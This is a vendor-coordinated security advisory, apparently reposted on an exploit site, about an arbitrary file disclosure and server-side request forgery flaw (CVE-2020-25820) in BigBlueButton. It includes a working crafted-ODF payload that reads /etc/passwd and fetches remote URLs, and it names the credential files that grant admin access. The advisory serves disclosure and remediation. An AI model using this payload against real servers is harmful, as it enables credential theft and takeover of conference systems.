Author

RedTeam

Risk

[

Security Risk Medium

]

0day-ID

0day-ID-35111

Category

web applications

Date add

21-10-2020

CVE

CVE-2020-25820

Platform

linux

RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.


Details
=======

Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
                    Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820


Introduction
============

"BigBlueButton is a web conferencing system designed for online
learning."

(from the vendor's homepage)


More Details
============

BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].

The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.

LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.


Proof of Concept
================

Start from an empty ODF Text Document and extract the content:

$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive:  empty.odt
 extracting: mimetype
   creating: Configurations2/accelerator/
   creating: Configurations2/images/Bitmaps/
   creating: Configurations2/toolpanel/
   creating: Configurations2/progressbar/
   creating: Configurations2/statusbar/
   creating: Configurations2/toolbar/
   creating: Configurations2/floater/
   creating: Configurations2/popupmenu/
   creating: Configurations2/menubar/
  inflating: manifest.rdf
  inflating: meta.xml
  inflating: settings.xml
 extracting: Thumbnails/thumbnail.png
  inflating: styles.xml
  inflating: content.xml
  inflating: META-INF/manifest.xml


Replace the <office:body> element in the file content.xml with the
following:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source
        xlink:href="file:///etc/passwd"
        xlink:type="simple"
        xlink:show="embed"
        xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

The text document now includes a section that references the external
file /etc/passwd. Create an new ODF Text Document with the modified
content:

$ zip -r ../modified.odt *

The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:

<office:body>
  <office:text>
    <text:section text:name="string">
      <text:section-source
        xlink:href="http://example.com"
        xlink:type="simple"
        xlink:show="embed"
        xlink:actuate="onLoad"/>
    </text:section>
  </office:text>
</office:body>

When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.


Workaround
==========

To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.


Fix
===

Update to fixed version 2.2.27. Change API key after update.



Security Risk
=============

As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.

Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.

To exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.

#  0day.today [2024-11-16]  #